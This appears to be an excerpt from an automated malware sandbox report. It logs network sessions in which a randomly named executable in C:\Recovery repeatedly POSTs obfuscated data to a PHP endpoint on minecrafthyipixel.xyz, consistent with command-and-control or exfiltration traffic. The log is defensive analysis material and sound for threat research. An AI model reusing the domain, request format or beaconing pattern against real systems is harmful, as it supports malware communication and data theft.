                                                                                                                                    Apr 19, 2024 13:43:11.092704058 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:11.093775988 CEST2504OUTData Raw: 57 54 5b 5e 59 43 54 5b 5c 5e 59 59 57 57 58 5e 54 55 5f 5f 54 5c 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT[^YCT[\^YYWWX^TU__T\SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\'=55+(&0 '!Q=;?')01(>#"1*+7] Z,_:%$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:11.346618891 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:11 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SnR%2BQRiSL9MgJytstew053UNRmdg%2B43e2FYmY4ZWsZdi%2FMlhzdUBqpe21UNW5Euyk%2BR781l8DdQQhJqPBU6sjH7wXqYwugDzvZiBmThL6j1%2F981zxm3Ruz4HIETHWlsrhWtWq%2B5BKRs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2ae0cbb7bac-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:11.346684933 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    59192.168.2.449808104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:11.586021900 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:11.691106081 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:11.691415071 CEST2504OUTData Raw: 52 5e 5e 55 59 43 51 5f 5c 5e 59 59 57 57 58 5d 54 57 5f 5c 54 5d 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^UYCQ_\^YYWWX]TW_\T]SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\'-"V67$V('*(0%/1+2P!2*+_ < .%$[. X =
                                                                                                                                    Apr 19, 2024 13:43:12.041815042 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:11 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxj3y9w9KQLqgXaKLN2EfoM2LLQcxiBOhhwi6gh2pH8eeMStoMNGJ2Nba6GGRzgIHLRD6p83IKOVzYl9fXtw813lBcmK9a2vAp%2F0ISMIsZ53Ek9dkOIZq%2F8DDik0EK3rkUC7A0FYC5E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2b1bad7457e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:12.041877985 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    60192.168.2.449809104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:12.268150091 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:12.372987986 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:12.373280048 CEST2512OUTData Raw: 57 5e 5e 5f 59 40 54 5f 5c 5e 59 59 57 53 58 5a 54 5b 5f 5b 54 59 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^_Y@T_\^YYWSXZT[_[TYS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z&- ;X$3'[%8!U=;#%_$&*R 2%++, ;9$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:12.739717960 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:12 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QH46xtUpj4GyX2gKPcgnpvdxLx3flGfMPf%2BXHYcjF%2Fcbf9pr8UUTzao03ym8GMH8S6NOEvdQQec%2Bxt8Wl3ZIGPoYy39VqNLbsR66wgC%2FipQZOx1ML6m92ATQshyljejX6QevGwsAVQA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2b60bec12d3-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:12.739784956 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    61192.168.2.449810104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:12.978847027 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:13.083214998 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:13.083786011 CEST2512OUTData Raw: 52 5f 5b 5e 5c 43 51 5d 5c 5e 59 59 57 53 58 58 54 5a 5f 56 54 5f 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_[^\CQ]\^YYWSXXTZ_VT_SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^'-6U6<]$V7\'+->('X%3%*7=]7^7//%$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:13.351658106 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:13 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ELXinI2fYNMEe6MhLuEwND5qxqKvkSlpzuAKaKRCIlB7BrEaWX6NYnQNzI6Uo2UFOTe2IUqj3RXw46EtIL9tYTn6amObO8S%2BRYImQOlsHLMvgy87iQzlX4V2Fp57yoHan7IcGSi0q04%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2ba79ecb0e5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:13.351725101 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    62192.168.2.449811104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:13.585453033 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:13.690002918 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:13.690309048 CEST2512OUTData Raw: 57 5d 5e 5f 59 43 54 5e 5c 5e 59 59 57 56 58 53 54 54 5f 5a 54 5b 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^_YCT^\^YYWVXSTT_ZT[S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1""+&0]0+);+_&,V2.S "=]+4,/5$[. X !
                                                                                                                                    Apr 19, 2024 13:43:14.046247959 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:13 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NcFXNk8kFvuampvG3DA6HOHXEXdY%2BUj8FvEZeY0v8Dxdc4LFi3CpquYtmRF6yy9jWN8q%2BcxjI%2BXQ1zXlXvaRYyU2m7SxkfrFdshE4JVuIsBp8jIqVb4QK405Pt8NCbafrtZC8upmgo8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2be3a927bd8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:14.046308994 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    63192.168.2.449812104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:14.415581942 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:14.520068884 CEST25INHTTP/1.1 100 Continue


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    64192.168.2.449813104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:14.566323996 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2172
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:14.670918941 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:14.671087027 CEST2172OUTData Raw: 52 59 5e 5b 59 41 54 5d 5c 5e 59 59 57 54 58 59 54 5a 5f 5d 54 5d 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^[YAT]\^YYWTXYTZ_]T]SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&-65+(Y&0+%+">;+X&*8T2"R4"*V=+"?<:5$[. X )
                                                                                                                                    Apr 19, 2024 13:43:14.961277962 CEST764INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:14 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g61dBE86lUh65Onu4wUJGNCTsOiB13K1qIYI8Z5QFAaK0FosvBc3Fu9yY4PK5XV2EcMOYCHxfW2UY%2FIe6KhBWMjGaxvwOkeE352rTl66z4qpsqnAUOjwmfYmfwRErz2OAhHSAyf3nwY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2c46fd24531-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 27 07 24 1f 2a 59 20 39 3f 58 29 33 22 1c 3d 27 2a 06 3e 5f 26 03 34 5b 2b 0d 2f 14 38 5b 3c 2b 00 17 32 30 21 52 27 13 23 08 25 1a 21 59 00 1a 3a 04 22 3f 3d 11 2e 07 3e 02 2a 31 22 02 23 0c 3f 16 2a 2e 21 50 34 06 2f 18 3d 3e 21 53 38 2b 24 51 3c 06 36 02 2f 24 35 06 21 01 2c 52 09 12 25 1a 3c 38 2c 5b 27 23 21 56 37 32 24 13 3f 3c 32 58 33 02 20 1c 24 30 28 5f 3a 0b 25 0f 32 00 36 0c 29 2a 3c 1f 37 3c 21 1b 31 3e 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98'$*Y 9?X)3"='*>_&4[+/8[<+20!R'#%!Y:"?=.>*1"#?*.!P4/=>!S8+$Q<6/$5!,R%<8,['#!V72$?<2X3 $0(_:%26)*<7<!1>.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:14.961371899 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    65192.168.2.449814104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:14.689846992 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:14.794557095 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:14.795125961 CEST2512OUTData Raw: 57 5a 5e 5a 59 45 54 55 5c 5e 59 59 57 55 58 5d 54 56 5f 5d 54 58 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^ZYETU\^YYWUX]TV_]TXS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1U"+'#4%8!V*87\2: &(= "6U=]$"?,/%$[. X -
                                                                                                                                    Apr 19, 2024 13:43:15.094398022 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:15 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=82uM9j8HsvHMtAyqA1Mv5QzYObsW5Q%2Bwf0YXfesLWOD8VB5QFNtgtD%2B8kXhlELwWyaRGAh7U25NKlLAqRhPiXRtOm%2F0WeVTqHi%2B6uddiMeGAjYyoYrRYGMAOojenhCfeWtvlLPlzDDw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2c52c22b02c-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:15.094460964 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    66192.168.2.449815104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:15.332034111 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:15.436494112 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:15.436656952 CEST2512OUTData Raw: 52 5e 5b 5c 59 45 54 5c 5c 5e 59 59 57 53 58 53 54 50 5f 56 54 5c 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[\YET\\^YYWSXSTP_VT\S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%&6]8[33;^'85W=?X2*,$+) 6)/^4Z0-$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:15.727946043 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:15 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZbTA08ieJ6LhdVtoh5pUUlxfwpJdHxx%2Fd4C4gzAq6t5uzk2E0bmVYFHnzEUB9dKz4GjpQhMe4wqyFFDk%2Fmk0AkpBiBrtZj%2F9RjPXaif%2FFeyAkTVQtDZxtPF389lIbkyKkcf8zVcOjpA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2c92ea5b032-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:15.728005886 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    67192.168.2.449816104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:15.984397888 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:16.088918924 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:16.089243889 CEST2512OUTData Raw: 52 5a 5b 5e 59 4a 51 5a 5c 5e 59 59 57 56 58 5b 54 54 5f 5f 54 55 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ[^YJQZ\^YYWVX[TT__TUSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^2=2R5;4Y$3?'1W?+7Y%$T1;.Q#5>;?4<_9$[. X !
                                                                                                                                    Apr 19, 2024 13:43:16.452214003 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:16 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
